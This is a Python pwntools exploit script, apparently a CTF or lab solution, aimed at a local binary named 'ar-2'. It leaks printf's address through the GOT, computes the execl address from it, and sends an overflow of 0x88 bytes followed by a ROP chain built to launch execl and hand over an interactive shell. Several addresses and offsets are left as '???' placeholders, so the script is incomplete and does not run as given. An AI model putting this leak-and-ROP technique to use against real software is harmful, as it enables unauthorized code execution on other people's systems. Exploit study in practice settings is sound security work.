#!/usr/bin/env python

from pwn import *

p = process("./ar-2")
context.terminal = ["tmux", "splitw", "-h"]
# gdb.attach(p, "b *input_func + 74")

printf_got = p.elf.got['printf']
print("print_got:" + hex(printf_got))

print(p.recvuntil(b"(N, in decimal)?"))
p.sendline(b"8")

print(p.recvuntil(b"0xffffde01)?"))
p.sendline(hex(printf_got))

data = p.recv()
print("data: " + repr(data))
d = data.split(b'\n')[1][0:8]
printf_addr = u64(d)
info("printf_addr:" + hex(printf_addr))

execl_addr = printf_addr - ????

pop_rdi_ret = ???
pop_rsi_r15_ret = ???

link_str = ???

buf = b"A" * 0x88
buf += p64(pop_rdi_ret)
buf += p64(link_str)
buf += p64(pop_rsi_r15_ret)
buf += p64(0)
buf += p64(0)
buf += p64(execl_addr)

p.sendline(buf)
p.interactive()